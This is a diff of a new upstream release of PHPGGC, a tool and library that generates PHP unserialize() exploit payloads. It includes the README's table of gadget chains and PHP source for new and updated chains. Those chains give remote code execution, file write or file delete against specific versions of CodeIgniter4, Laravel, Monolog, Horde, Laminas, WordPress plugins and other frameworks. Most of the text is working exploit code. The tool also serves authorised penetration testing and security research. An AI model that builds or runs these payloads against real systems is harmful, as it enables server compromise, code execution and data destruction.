New upstream version 0.20210218
Arnaud Rebillout
3 years ago
0 | FROM php:7.4-cli-alpine AS builder | |
1 | ||
2 | COPY . /phpggc | |
3 | ||
4 | WORKDIR /phpggc | |
5 | ||
6 | RUN chmod +x phpggc && echo "phar.readonly=0" > $PHP_INI_DIR/php.ini | |
7 | ||
8 | ENTRYPOINT ["/phpggc/phpggc"] |
1 | 1 | |
2 | 2 | *PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically*. |
3 | 3 | When encountering an unserialize on a website you don't have the code of, or simply when trying to build an exploit, this tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. It can be seen as the equivalent of [frohoff's ysoserial](https://github.com/frohoff/ysoserial), but for PHP. |
4 | Currently, the tool supports: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework. | |
4 | Currently, the tool supports gadget chains such as: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework. | |
5 | 5 | |
6 | 6 | |
7 | 7 | ## Requirements |
8 | 8 | |
9 | 9 | PHP >= 5.6 is required to run PHPGGC. |
10 | PHP 8 is not yet supported. | |
10 | 11 | |
11 | 12 | |
12 | 13 | ## Usage |
19 | 20 | Gadget Chains |
20 | 21 | ------------- |
21 | 22 | |
22 | NAME VERSION TYPE VECTOR I | |
23 | CodeIgniter4/RCE1 4.0.0-beta.1 <= ? rce __destruct | |
24 | Doctrine/FW1 ? file_write __toString * | |
25 | Drupal7/FD1 7.0 < ? file_delete __destruct * | |
26 | Drupal7/RCE1 7.0.8 < ? rce __destruct * | |
27 | Guzzle/FW1 6.0.0 <= 6.3.3+ file_write __destruct | |
28 | Guzzle/INFO1 6.0.0 <= 6.3.2 phpinfo() __destruct * | |
29 | Guzzle/RCE1 6.0.0 <= 6.3.2 rce __destruct * | |
30 | Laravel/RCE1 5.4.27 rce __destruct | |
31 | Laravel/RCE2 5.5.39 rce __destruct | |
32 | Laravel/RCE3 5.5.39 rce __destruct * | |
33 | Laravel/RCE4 5.5.39 rce __destruct | |
34 | Laravel/RCE5 5.8.30 rce __destruct * | |
35 | Laravel/RCE6 5.5.* rce __destruct * | |
36 | Magento/FW1 ? <= 1.9.4.0 file_write __destruct * | |
37 | Magento/SQLI1 ? <= 1.9.4.0 sql_injection __destruct | |
38 | Monolog/RCE1 1.18 <= 1.23 rce __destruct | |
39 | Monolog/RCE2 1.5 <= 1.17 rce __destruct | |
40 | Phalcon/RCE1 <= 1.2.2 rce __wakeup * | |
41 | Pydio/Guzzle/RCE1 < 8.2.2 rce __toString | |
42 | Slim/RCE1 3.8.1 rce __toString | |
43 | SwiftMailer/FD1 -5.4.12+, -6.2.1+ file_delete __destruct | |
44 | SwiftMailer/FW1 5.1.0 <= 5.4.8 file_write __toString | |
45 | SwiftMailer/FW2 6.0.0 <= 6.0.1 file_write __toString | |
46 | SwiftMailer/FW3 5.0.1 file_write __toString | |
47 | SwiftMailer/FW4 4.0.0 <= ? file_write __destruct | |
48 | Symfony/FW1 2.5.2 file_write DebugImport * | |
49 | Symfony/FW2 3.4 file_write __destruct | |
50 | Symfony/RCE1 3.3 rce __destruct * | |
51 | Symfony/RCE2 2.3.42 < 2.6 rce __destruct * | |
52 | Symfony/RCE3 2.6 <= 2.8.32 rce __destruct * | |
53 | Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 rce __destruct * | |
54 | ThinkPHP/RCE1 5.1.x-5.2.x rce __destruct * | |
55 | WordPress/Guzzle/RCE1 4.0.0 <= 6.4.1+ rce __toString * | |
56 | WordPress/Guzzle/RCE2 4.0.0 <= 6.4.1+ rce __destruct * | |
57 | WordPress/P/WooCommerce/RCE1 3.4.0 <= 3.6.2+ rce __destruct * | |
58 | WordPress/P/YetAnotherStarsRating/RCE1 ? <= 1.8.6 rce __destruct * | |
59 | Yii/RCE1 1.1.20 rce __wakeup * | |
60 | ZendFramework/FD1 ? <= 1.12.20 file_delete __destruct | |
61 | ZendFramework/RCE1 ? <= 1.12.20 rce __destruct * | |
62 | ZendFramework/RCE2 1.11.12 <= 1.12.20 rce __toString * | |
63 | ZendFramework/RCE3 2.0.1 <= ? rce __destruct | |
23 | NAME VERSION TYPE VECTOR I | |
24 | CodeIgniter4/RCE1 4.0.0-beta.1 <= 4.0.0-rc.4 RCE (Function call) __destruct | |
25 | CodeIgniter4/RCE2 4.0.0-rc.4 <= 4.0.4+ RCE (Function call) __destruct | |
26 | Doctrine/FW1 ? File write __toString * | |
27 | Drupal7/FD1 7.0 < ? File delete __destruct * | |
28 | Drupal7/RCE1 7.0.8 < ? RCE (Function call) __destruct * | |
29 | Guzzle/FW1 6.0.0 <= 6.3.3+ File write __destruct | |
30 | Guzzle/INFO1 6.0.0 <= 6.3.2 phpinfo() __destruct * | |
31 | Guzzle/RCE1 6.0.0 <= 6.3.2 RCE (Function call) __destruct * | |
32 | Horde/RCE1 <= 5.2.22 RCE (PHP code) __destruct * | |
33 | Laminas/FD1 <= 2.11.2 File delete __destruct | |
34 | Laravel/RCE1 5.4.27 RCE (Function call) __destruct | |
35 | Laravel/RCE2 5.5.39 RCE (Function call) __destruct | |
36 | Laravel/RCE3 5.5.39 RCE (Function call) __destruct * | |
37 | Laravel/RCE4 5.5.39 RCE (Function call) __destruct | |
38 | Laravel/RCE5 5.8.30 RCE (PHP code) __destruct * | |
39 | Laravel/RCE6 5.5.* RCE (PHP code) __destruct * | |
40 | Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct * | |
41 | Magento/FW1 ? <= 1.9.4.0 File write __destruct * | |
42 | Magento/SQLI1 ? <= 1.9.4.0 SQL injection __destruct | |
43 | Monolog/RCE1 1.18 <= 2.1.1+ RCE (Function call) __destruct | |
44 | Monolog/RCE2 1.5 <= 2.1.1+ RCE (Function call) __destruct | |
45 | Monolog/RCE3 1.1.0 <= 1.10.0 RCE (Function call) __destruct | |
46 | Monolog/RCE4 ? <= 2.4.4+ RCE (Command) __destruct * | |
47 | Phalcon/RCE1 <= 1.2.2 RCE __wakeup * | |
48 | PHPCSFixer/FD1 <= 2.17.3 File delete __destruct | |
49 | PHPCSFixer/FD2 <= 2.17.3 File delete __destruct | |
50 | PHPExcel/FD1 1.8.2+ File delete __destruct | |
51 | PHPExcel/FD2 <= 1.8.1 File delete __destruct | |
52 | PHPExcel/FD3 1.8.2+ File delete __destruct | |
53 | PHPExcel/FD4 <= 1.8.1 File delete __destruct | |
54 | Pydio/Guzzle/RCE1 < 8.2.2 RCE (Function call) __toString | |
55 | Slim/RCE1 3.8.1 RCE (Function call) __toString | |
56 | Smarty/FD1 ? File delete __destruct | |
57 | Smarty/SSRF1 ? SSRF __destruct * | |
58 | SwiftMailer/FD1 -5.4.12+, -6.2.1+ File delete __destruct | |
59 | SwiftMailer/FW1 5.1.0 <= 5.4.8 File write __toString | |
60 | SwiftMailer/FW2 6.0.0 <= 6.0.1 File write __toString | |
61 | SwiftMailer/FW3 5.0.1 File write __toString | |
62 | SwiftMailer/FW4 4.0.0 <= ? File write __destruct | |
63 | Symfony/FW1 2.5.2 File write DebugImport * | |
64 | Symfony/FW2 3.4 File write __destruct | |
65 | Symfony/RCE1 3.3 RCE (Command) __destruct * | |
66 | Symfony/RCE2 2.3.42 < 2.6 RCE (PHP code) __destruct * | |
67 | Symfony/RCE3 2.6 <= 2.8.32 RCE (PHP code) __destruct * | |
68 | Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 RCE (Function call) __destruct * | |
69 | TCPDF/FD1 <= 6.3.5 File delete __destruct * | |
70 | ThinkPHP/RCE1 5.1.x-5.2.x RCE (Function call) __destruct * | |
71 | WordPress/Dompdf/RCE1 0.8.5+ & WP < 5.5.2 RCE (Function call) __destruct * | |
72 | WordPress/Dompdf/RCE2 0.7.0 <= 0.8.4 & WP < 5.5.2 RCE (Function call) __destruct * | |
73 | WordPress/Guzzle/RCE1 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __toString * | |
74 | WordPress/Guzzle/RCE2 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __destruct * | |
75 | WordPress/P/EmailSubscribers/RCE1 4.0 <= 4.4.7+ & WP < 5.5.2 RCE (Function call) __destruct * | |
76 | WordPress/P/EverestForms/RCE1 1.0 <= 1.6.7+ & WP < 5.5.2 RCE (Function call) __destruct * | |
77 | WordPress/P/WooCommerce/RCE1 3.4.0 <= 4.1.0+ & WP < 5.5.2 RCE (Function call) __destruct * | |
78 | WordPress/P/WooCommerce/RCE2 <= 3.4.0 & WP < 5.5.2 RCE (Function call) __destruct * | |
79 | WordPress/P/YetAnotherStarsRating/RCE1 ? <= 1.8.6 & WP < 5.5.2 RCE (Function call) __destruct * | |
80 | WordPress/PHPExcel/RCE1 1.8.2+ & WP < 5.5.2 RCE (Function call) __toString * | |
81 | WordPress/PHPExcel/RCE2 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __toString * | |
82 | WordPress/PHPExcel/RCE3 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct * | |
83 | WordPress/PHPExcel/RCE4 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct * | |
84 | WordPress/PHPExcel/RCE5 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct * | |
85 | WordPress/PHPExcel/RCE6 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct * | |
86 | Yii/RCE1 1.1.20 RCE (Function call) __wakeup * | |
87 | Yii2/RCE1 <2.0.38 RCE (Function call) __destruct * | |
88 | Yii2/RCE2 <2.0.38 RCE (PHP code) __destruct * | |
89 | ZendFramework/FD1 ? <= 1.12.20 File delete __destruct | |
90 | ZendFramework/RCE1 ? <= 1.12.20 RCE (PHP code) __destruct * | |
91 | ZendFramework/RCE2 1.11.12 <= 1.12.20 RCE (Function call) __toString * | |
92 | ZendFramework/RCE3 2.0.1 <= ? RCE (Function call) __destruct | |
93 | ZendFramework/RCE4 ? <= 1.12.20 RCE (PHP code) __destruct * | |
94 | ||
95 | ``` | |
96 | ||
97 | Filter gadget chains: | |
98 | ||
99 | ``` | |
100 | $ ./phpggc -l laravel | |
101 | ||
102 | Gadget Chains | |
103 | ------------- | |
104 | ||
105 | NAME VERSION TYPE VECTOR I | |
106 | Laravel/RCE1 5.4.27 RCE (Function call) __destruct | |
107 | Laravel/RCE2 5.5.39 RCE (Function call) __destruct | |
108 | Laravel/RCE3 5.5.39 RCE (Function call) __destruct * | |
109 | Laravel/RCE4 5.5.39 RCE (Function call) __destruct | |
110 | Laravel/RCE5 5.8.30 RCE (PHP code) __destruct * | |
111 | Laravel/RCE6 5.5.* RCE (PHP code) __destruct * | |
112 | Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct * | |
64 | 113 | |
65 | 114 | ``` |
66 | 115 | |
139 | 188 | a:1:{s:7:"message";O:18:"Slim\Http\Response":2:{...}} |
140 | 189 | ``` |
141 | 190 | |
191 | ||
142 | 192 | ## PHAR(GGC) |
143 | 193 | |
144 | 194 | ### History |
254 | 304 | For instance, use `./phpggc -n Drupal RCE` would create a new Drupal RCE gadgetchain. |
255 | 305 | |
256 | 306 | |
307 | ||
308 | ## Docker | |
309 | ||
310 | If you don't want to install PHP, you can use `docker build`. | |
311 | ||
312 | ||
257 | 313 | # License |
258 | 314 | |
259 | 315 | [Apache License 2.0](LICENSE) |
1 | 1 | |
2 | 2 | namespace GadgetChain\CodeIgniter4; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | public static $version = '4.0.0-beta.1 <= ?'; | |
6 | public static $version = '4.0.0-beta.1 <= 4.0.0-rc.4'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'eboda'; |
9 | 9 | |
14 | 14 | |
15 | 15 | return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter); |
16 | 16 | } |
17 | } | |
17 | }⏎ |
0 | 0 | <?php |
1 | ||
1 | 2 | namespace CodeIgniter\Cache\Handlers { |
2 | 3 | class RedisHandler { |
3 | 4 | protected $redis; |
66 | 67 | class BaseBuilder { |
67 | 68 | } |
68 | 69 | } |
69 | ||
70 |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\CodeIgniter4; | |
3 | ||
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '4.0.0-rc.4 <= 4.0.4+'; // tested on 4.0.0-rc.4, 4.0.3 & 4.0.4 | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'eboda'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter); | |
16 | } | |
17 | } |
0 | <?php | |
1 | ||
2 | namespace CodeIgniter\Cache\Handlers { | |
3 | class RedisHandler { | |
4 | protected $redis; | |
5 | ||
6 | public function __construct($func, $param) { | |
7 | $this->redis = new \CodeIgniter\Session\Handlers\MemcachedHandler( | |
8 | new \CodeIgniter\Model( | |
9 | new \CodeIgniter\Database\BaseBuilder( | |
10 | new \CodeIgniter\Database\MySQLi\Connection | |
11 | ), | |
12 | new \CodeIgniter\Validation\Validation, | |
13 | $func, | |
14 | new \CodeIgniter\Database\MySQLi\Connection | |
15 | ), | |
16 | array("x" => $param) | |
17 | ); | |
18 | } | |
19 | } | |
20 | } | |
21 | ||
22 | namespace CodeIgniter\Session\Handlers { | |
23 | class MemcachedHandler { | |
24 | protected $memcached; | |
25 | protected $lockKey; | |
26 | ||
27 | public function __construct($memcached, $param) { | |
28 | $this->lockKey = $param; | |
29 | $this->memcached = $memcached; | |
30 | } | |
31 | } | |
32 | } | |
33 | ||
34 | namespace CodeIgniter { | |
35 | class Model { | |
36 | protected $builder; | |
37 | protected $primaryKey; | |
38 | protected $beforeDelete; | |
39 | protected $validationRules; | |
40 | protected $validation; | |
41 | protected $tempAllowCallbacks; | |
42 | ||
43 | public function __construct($builder, $validation, $func, $db) { | |
44 | $this->builder = $builder; | |
45 | $this->primaryKey = null; | |
46 | ||
47 | $this->beforeDelete = array(); | |
48 | $this->beforeDelete[] = "validate"; | |
49 | ||
50 | $this->tempAllowCallbacks = 1; | |
51 | $this->db = $db; | |
52 | ||
53 | $this->cleanValidationRules = false; | |
54 | $this->validation = $validation; | |
55 | $this->validationRules = array( | |
56 | "id.x" => array( | |
57 | "rules" => array($func, "dd") // function "dd" exits the script. | |
58 | ) | |
59 | ); | |
60 | } | |
61 | } | |
62 | } | |
63 | ||
64 | namespace CodeIgniter\Validation { | |
65 | class Validation { | |
66 | protected $ruleSetFiles; | |
67 | ||
68 | public function __construct() { | |
69 | $this->ruleSetFiles = array("finfo"); | |
70 | } | |
71 | } | |
72 | } | |
73 | ||
74 | namespace CodeIgniter\Database { | |
75 | class BaseBuilder { | |
76 | public function __construct($db) { | |
77 | $this->QBFrom = array("()"); | |
78 | $this->db = $db; | |
79 | } | |
80 | } | |
81 | } | |
82 | ||
83 | namespace CodeIgniter\Database\MySQLi { | |
84 | class Connection { | |
85 | } | |
86 | } | |
87 |
15 | 15 | public static $version = '?'; |
16 | 16 | public static $vector = '__toString'; |
17 | 17 | public static $author = 'cf'; |
18 | public static $informations = ' | |
18 | public static $information = ' | |
19 | 19 | We do not have full control of the path. If you enter |
20 | 20 | /var/www/toto/shell.php as the remote_path, it will be converted to |
21 | 21 | /var/www/toto/e3/5b737464436c61737324434c4153534d455441444154415d5b315d.php. |
6 | 6 | public static $version = '7.0 < ?'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'rreiss'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | Note that some files may not be removed (depends on permissions) |
11 | 11 | '; |
12 | 12 |
1 | 1 | |
2 | 2 | namespace GadgetChain\Drupal7; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '7.0.8 < ?'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'Blaklis'; |
9 | public static $informations = 'You will need to post form_build_id=DrupalRCE to /?q=system/ajax once the payload is unserialized'; | |
9 | public static $information = 'You will need to post form_build_id=DrupalRCE to /?q=system/ajax once the payload is unserialized'; | |
10 | 10 | |
11 | 11 | public function generate(array $parameters) |
12 | 12 | { |
6 | 6 | public static $version = '6.0.0 <= 6.3.2'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'erwan_lr'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | This chain requires GuzzleHttp\Psr7 < 1.5.0, because FnStream cannot be |
11 | 11 | deserialized afterwards. |
12 | 12 | See https://github.com/ambionics/phpggc/issues/34 |
1 | 1 | |
2 | 2 | namespace GadgetChain\Guzzle; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '6.0.0 <= 6.3.2'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'proclnas'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | This chain requires GuzzleHttp\Psr7 < 1.5.0, because FnStream cannot be |
11 | 11 | deserialized afterwards. |
12 | 12 | See https://github.com/ambionics/phpggc/issues/34 |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Horde; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
5 | { | |
6 | public static $version = '<= 5.2.22'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $foundby = 'EgiX'; | |
9 | public static $author = 'mr_me'; | |
10 | public static $information = ' | |
11 | This chain was used against 34 different 0day endpoints targeting Horde v5.2.22. Other versions are probably affected | |
12 | See https://srcincite.io/blog/2020/08/19/a-smorgashorde-of-vulnerabilities-a-comparative-analysis-of-discovery.html | |
13 | '; | |
14 | ||
15 | public function generate(array $parameters) | |
16 | { | |
17 | $code = $parameters['code'] . ';die;'; | |
18 | return new \Horde_Kolab_Server_Decorator_Clean($code); | |
19 | } | |
20 | } | |
21 | ?> |
0 | <?php | |
1 | ||
2 | class Horde_Config | |
3 | { | |
4 | protected $_oldConfig; | |
5 | function __construct($code) | |
6 | { | |
7 | $this->_oldConfig = $code; | |
8 | } | |
9 | } | |
10 | ||
11 | class Horde_Prefs_Scope implements Serializable | |
12 | { | |
13 | protected $_prefs = array(1); | |
14 | protected $scope; | |
15 | public function serialize() | |
16 | { | |
17 | return json_encode(array( | |
18 | $this->scope, | |
19 | $this->_prefs | |
20 | )); | |
21 | } | |
22 | ||
23 | public function unserialize($data) | |
24 | { | |
25 | list($this->scope, $this->_prefs) = json_decode($data, true); | |
26 | } | |
27 | } | |
28 | ||
29 | class Horde_Prefs | |
30 | { | |
31 | protected $_opts, $_scopes; | |
32 | function __construct($code) | |
33 | { | |
34 | $this->_opts['sizecallback'] = array(new Horde_Config($code), 'readXMLConfig'); | |
35 | $this->_scopes['horde'] = new Horde_Prefs_Scope; | |
36 | } | |
37 | } | |
38 | ||
39 | class Horde_Prefs_Identity | |
40 | { | |
41 | protected $_prefs, $_prefnames, $_identities; | |
42 | function __construct($code) | |
43 | { | |
44 | $this->_identities = array(0); | |
45 | $this->_prefs = new Horde_Prefs($code); | |
46 | $this->_prefnames['identities'] = 0; | |
47 | } | |
48 | } | |
49 | ||
50 | class Horde_Kolab_Server_Decorator_Clean | |
51 | { | |
52 | private $_server, $_added; | |
53 | function __construct($code) | |
54 | { | |
55 | $this->_added = array(0); | |
56 | $this->_server = new Horde_Prefs_Identity($code); | |
57 | } | |
58 | } | |
59 | ?> |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Laminas; | |
3 | ||
4 | class FD1 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '<= 2.11.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'MrTuxracer'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $remote_file = $parameters["remote_file"]; | |
13 | ||
14 | return new \Laminas\Http\Response\Stream($remote_file); | |
15 | } | |
16 | } |
0 | <?php | |
1 | namespace Laminas\Http\Response { | |
2 | class Stream { | |
3 | function __construct($remote_file) { | |
4 | $this->cleanup = '1'; | |
5 | $this->streamName = $remote_file; | |
6 | } | |
7 | } | |
8 | } |
1 | 1 | |
2 | 2 | namespace GadgetChain\Laravel; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '5.4.27'; |
7 | 7 | public static $vector = '__destruct'; |
1 | 1 | |
2 | 2 | namespace GadgetChain\Laravel; |
3 | 3 | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '5.5.39'; |
7 | 7 | public static $vector = '__destruct'; |
1 | 1 | |
2 | 2 | namespace GadgetChain\Laravel; |
3 | 3 | |
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '5.5.39'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'BlackFan'; |
9 | public static $informations = 'This chain triggers an ErrorException after code execution.'; | |
9 | public static $information = 'This chain triggers an ErrorException after code execution.'; | |
10 | 10 | |
11 | 11 | public function generate(array $parameters) |
12 | 12 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\Laravel; |
3 | 3 | |
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '5.5.39'; |
7 | 7 | public static $vector = '__destruct'; |
1 | 1 | |
2 | 2 | namespace GadgetChain\Laravel; |
3 | 3 | |
4 | class RCE5 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE5 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
5 | 5 | { |
6 | 6 | public static $version = '5.8.30'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'Phith0n'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | Executes given PHP code through eval(). |
11 | 11 | Requires Mockery, which is in the require-dev package. |
12 | 12 | '; |
13 | public static $parameters = [ | |
14 | 'code' | |
15 | ]; | |
16 | 13 | |
17 | 14 | public function generate(array $parameters) |
18 | 15 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\Laravel; |
3 | 3 | |
4 | class RCE6 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE6 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
5 | 5 | { |
6 | 6 | public static $version = '5.5.*'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'Phith0n & holyvier'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | Executes given PHP code through eval(). |
11 | 11 | Requires Mockery, which is in the require-dev package. |
12 | 12 | '; |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Laravel; | |
3 | ||
4 | class RCE7 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '? <= 8.16.1'; // will test for more version at a later date | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'whira'; | |
9 | public static $information = 'This chain throws a RuntimeException immediately after code execution.'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \Illuminate\Broadcasting\PendingBroadcast( | |
17 | $function, | |
18 | $parameter | |
19 | ); | |
20 | } | |
21 | } |
0 | <?php | |
1 | ||
2 | namespace Illuminate\Broadcasting | |
3 | { | |
4 | class PendingBroadcast | |
5 | { | |
6 | protected $events; | |
7 | protected $event; | |
8 | ||
9 | public function __construct($function, $parameter) | |
10 | { | |
11 | $this->events = new \Illuminate\Bus\Dispatcher($function); | |
12 | $this->event = new \Illuminate\Queue\CallQueuedClosure($parameter); | |
13 | } | |
14 | } | |
15 | } | |
16 | ||
17 | namespace Illuminate\Bus | |
18 | { | |
19 | class Dispatcher | |
20 | { | |
21 | protected $queueResolver; | |
22 | ||
23 | public function __construct($function) | |
24 | { | |
25 | $this->queueResolver = $function; | |
26 | ||
27 | } | |
28 | } | |
29 | } | |
30 | ||
31 | namespace Illuminate\Queue | |
32 | { | |
33 | class CallQueuedClosure | |
34 | { | |
35 | protected $connection; | |
36 | ||
37 | public function __construct($parameter) | |
38 | { | |
39 | $this->connection = $parameter; | |
40 | } | |
41 | } | |
42 | } | |
43 | ||
44 |
6 | 6 | public static $version = '? <= 1.9.4.0'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'eboda'; |
9 | public static $informations = 'The <remote_path> is either relative to the Magento root or absolute. The payload will throw an error during unserialization, but the file is written anyway.'; | |
9 | public static $information = 'The <remote_path> is either relative to the Magento root or absolute. The payload will throw an error during unserialization, but the file is written anyway.'; | |
10 | 10 | |
11 | 11 | public function generate(array $parameters) |
12 | 12 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\Monolog; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | public static $version = '1.18 <= 1.23'; | |
6 | public static $version = '1.18 <= 2.1.1+'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'cf'; |
9 | 9 | |
19 | 19 | ) |
20 | 20 | ); |
21 | 21 | } |
22 | }⏎ | |
22 | } |
1 | 1 | |
2 | 2 | namespace GadgetChain\Monolog; |
3 | 3 | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | public static $version = '1.5 <= 1.17'; | |
6 | public static $version = '1.5 <= 2.1.1+'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'cf'; |
9 | 9 |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Monolog; | |
3 | ||
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '1.1.0 <= 1.10.0'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'theBumble'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \Monolog\Handler\BufferHandler( | |
16 | ['current', $function], | |
17 | [$parameter, 'level' => null] | |
18 | ); | |
19 | } | |
20 | } |
0 | <?php | |
1 | ||
2 | namespace Monolog\Handler | |
3 | { | |
4 | class NativeMailerHandler { | |
5 | protected $to = null; | |
6 | protected $subject = null; | |
7 | protected $headers = null; | |
8 | ||
9 | protected $level = null; | |
10 | protected $bubble = false; | |
11 | protected $formatter = null; | |
12 | protected $processors; | |
13 | ||
14 | function __construct($methods) { | |
15 | $this->processors = $methods; | |
16 | ||
17 | } | |
18 | } | |
19 | ||
20 | class BufferHandler | |
21 | { | |
22 | protected $handler; | |
23 | protected $bufferSize = -1; | |
24 | protected $buffer; | |
25 | ||
26 | # ($record['level'] < $this->level) == false | |
27 | protected $level = null; | |
28 | protected $bubble = false; | |
29 | protected $formatter = null; | |
30 | protected $processors; | |
31 | ||
32 | function __construct($methods, $command) | |
33 | { | |
34 | $this->processors = null; | |
35 | $this->buffer = [$command]; | |
36 | $this->handler = new NativeMailerHandler($methods); | |
37 | } | |
38 | } | |
39 | } |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Monolog; | |
3 | ||
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE\Command | |
5 | { | |
6 | public static $version = '? <= 2.4.4+'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'whira'; | |
9 | public static $information = ' | |
10 | This chain will target debian based distribution (exim4 MTA) as it will perform a command injection on mail() | |
11 | and use exim4 extended strings, the payload is `/bin/bash -c "$command"`. | |
12 | As this GC requires a setup that is specific, you should have better results by running Monolog/RCE1 or | |
13 | Monolog/RCE2 instead. | |
14 | '; | |
15 | ||
16 | public function generate(array $parameters) | |
17 | { | |
18 | $command = $parameters['command']; | |
19 | ||
20 | return new \Monolog\Handler\RollbarHandler( | |
21 | new \Monolog\Handler\BufferHandler( | |
22 | new \Monolog\Handler\NativeMailerHandler($command) | |
23 | ) | |
24 | ); | |
25 | } | |
26 | } |
0 | <?php | |
1 | ||
2 | namespace Monolog\Handler | |
3 | { | |
4 | class RollbarHandler | |
5 | { | |
6 | private $hasRecords; | |
7 | protected $rollbarLogger; | |
8 | ||
9 | public function __construct($buffer) | |
10 | { | |
11 | $this->hasRecords = true; | |
12 | $this->rollbarLogger = $buffer; | |
13 | } | |
14 | } | |
15 | ||
16 | class BufferHandler | |
17 | { | |
18 | protected $bufferSize; | |
19 | protected $handler; | |
20 | protected $buffer; | |
21 | ||
